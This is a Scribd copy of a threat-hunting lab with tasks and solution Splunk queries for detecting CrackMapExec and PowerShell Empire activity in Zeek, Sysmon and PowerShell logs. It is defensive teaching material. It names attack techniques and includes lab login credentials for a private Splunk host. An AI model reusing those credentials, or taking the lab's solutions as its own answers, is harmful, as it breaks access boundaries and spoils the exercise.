Scribd
Upload
68 views9 pages

Goals: Crackmapexec

The IT Security manager has tasked you, the sole Threat hunter, to hunt for activity of the CrackMapExec framework using available logs. The tasks involve hunting for file transfers over SMB, connections between machines, access to admin shares, PowerShell activity, and self-signed certificates. Analyzing the logs using Splunk reveals activity matching CrackMapExec between two IP addresses.

Uploaded by

trdfsfscs
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
Download as pdf or txt
68 views9 pages

Goals: Crackmapexec

The IT Security manager has tasked you, the sole Threat hunter, to hunt for activity of the CrackMapExec framework using available logs. The tasks involve hunting for file transfers over SMB, connections between machines, access to admin shares, PowerShell activity, and self-signed certificates. Analyzing the logs using Splunk reveals activity matching CrackMapExec between two IP addresses.

Uploaded by

trdfsfscs
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
Download as pdf or txt
Download as pdf or txt
You are on page 1/ 9

The IT Security manager has now tasked you, the only Threat hunter, with performing a hunt for

the offensive framework CrackMapExec. The internal


penetration team has already generated CrackMapExec activity that will help you validate your hypotheses.

Zeek, Windows Security, Sysmon and PowerShell logs are available for this lab.

Goals
The learning objective of this lab is increase familiarity of doing a hands-on analysis with Splunk.

What you will learn


You will learn how to utilize available network and host-based logs to detect abnormal activity.

Recommended tools

Network Configuration
Splunk: 172.16.84.105

•Connection Type: Web (http:// 172.16.84.105:8000)

•Username: admin

•Password: eLSHunter
Tasks

Task 1. Have any files been transferred over SMB?


Begin by studying T1105 and create a detection search in Splunk.

Hint: Focus on Zeek logs, sourcetype "zeek_files" and sourcetype "zeek_smb_files", (specifically those with action of "SMB::FILE_OPEN"). For the most
important fields please refer to https://docs.zeek.org/en/current/

Task 2. Has the suspected attacker machine connected to the victim?


Study T1187 and hunt for relevant activity that may link successful remote connections.

Hint: Focus on Zeek logs, sourcetype "zeek_ntlm".

Task 3. Have windows admin shares be accessed remotely?


Study T1077 and hunt for relevant activity.

Hint: Focus on Zeek logs, sourcetype "zeek_smb_mapping".

Task 4. Has PowerShell Empire agent been executed on the victim


machine?
Hunt for PowerShell activity.

Hint: Focus on Sysmon and PowerShell logs for this hunt.


Task 5. Hunt for self-signed certificates
Hunt for self-signed certificates, since attackers usually utilize such certificates for convenience.

Hint: Focus on Zeek logs, sourcetype "zeek_ssl".

SOLUTIONS
Below, you can find solutions for each task. Remember though, that you can follow your own strategy, which may be different from the one explained in
the following lab.

Task 1. Have any files been transferred over SMB?


To identify certain type of network traffic, we'll utilize Zeek's logs. The ones we are interested in for this task are those with sourcetype of "zeek_files".
Zeek logs will provide hashes for transferred files, so we should take this into account during our hunt as well. Utilizing that information, we construct the
following query:

index=zeek sourcetype="zeek_files" SMB | spath "rx_hosts{}" | table rx_hosts{}, tx_hosts{}, filename, md5, sha1

Once the query is executed, we get the following match:


We can clearly see that some odd, 6 character and randomly named files were detected.

We can further enrich this by looking at Zeek logs with sourcetype of "zeek_smb_files", and specifically those with action of "SMB::FILE_OPEN". We then
construct the following query:

index=zeek sourcetype=zeek_smb_files action="SMB::FILE_OPEN" | table id.resp_h, id.resp_p, id.orig_h, id.orig_p, action, name

Once executed, we get the following match result:

Now we can see that those files were accessed remotely. From this we can suspect that 192.168.1.32 is the victim that connects to 192.168.1.34 on port
445.

The 6 character and randomly-named filenames of shares are one of the distinguishing artefacts that is linked to CrackMapExec v4.0 and 5.0.
Task 2. Has the suspected attacker machine connected to the victim?
For this task, we'll use Zeek logs again, specifically those with sourcetype "zeek_ntlm". Simply, we will list all logs in a defined table output format with the
query:

index=zeek sourcetype=zeek_ntlm | table id.resp_h, id.resp_p, id.orig_h, id.orig_p, domainname, success, username

Once executed, we get the following:

We can see that 192.168.1.34 has connected successfully to 192.168.1.32 with the account "Administrator" (NTLM authentication, which is often
generated by connecting remotely over SMB with plain text password or performing pass the hash).

Task 3. Have windows admin shares be accessed remotely?


For this task again, we'll look again Zeek logs again, specifically those with sourcetype "zeek_smb_mapping". Simply, we will list all logs in a defined table
output format with the query:

index=zeek sourcetype="zeek_smb_mapping" | table id.resp_h, id.resp_p, id.orig_h, id.orig_p, path, share_type

Once executed, we get the following:


It

appears that 192.168.1.34 has created multiple connections to the IPC$ share of 192.168.1.32. This is expected behavior when executing commands over
SMB on a remote machine.

Task 4. Has PowerShell Empire agent been executed on the victim


machine?
For this task, we'll utilize Sysmon logs, specifically whether a process was started with suspicious command line argument that contains "powershell.",
which is generated by default in Empire agents. We will use the following query to search for "powershell":

index=* powershell

Once executed, among a list of matched events, we'll see this one:
If

we go forward and decode the obfuscated command, we will indeed note that this matches Empire's stager.

We could also look into PowerShell ScriptBlock logs with Event ID 4104, that will display captured PowerShell activity. A simple query and looking for
those that contain "Warning" in them already provides a wealth of potentially malicious obfuscated commands:
Task 5. Hunt for self-signed certificates
An interesting indicator of compromise is the existence of self-signed SSL certificates in your environment (of course your organization will have to adopt
using certificates signed by trusted entities for this hunting technique to have a meaning)

The below Splunk search can reveal self-signed SSL certificates or certificates with multiple empty fields. Both can be used as an alarm.

index=zeek sourcetype=zeek_ssl |table cipher, curve, client_cert_chain_fuids, client_issuer, client_subject, C, version, subject, validation_status
If you look carefully enough, you will identify that the self-signed certificate is related to the attacking host we found during the previous tasks!

KEY TAKEWAYS
1.Robust detection rules are required to perform high quality hunts

2.Combining network and host-based activity provides greater visibility into the actions performed and helps to identify adversary actions that may be
hard (or impossible) by looking at only one source.

You might also like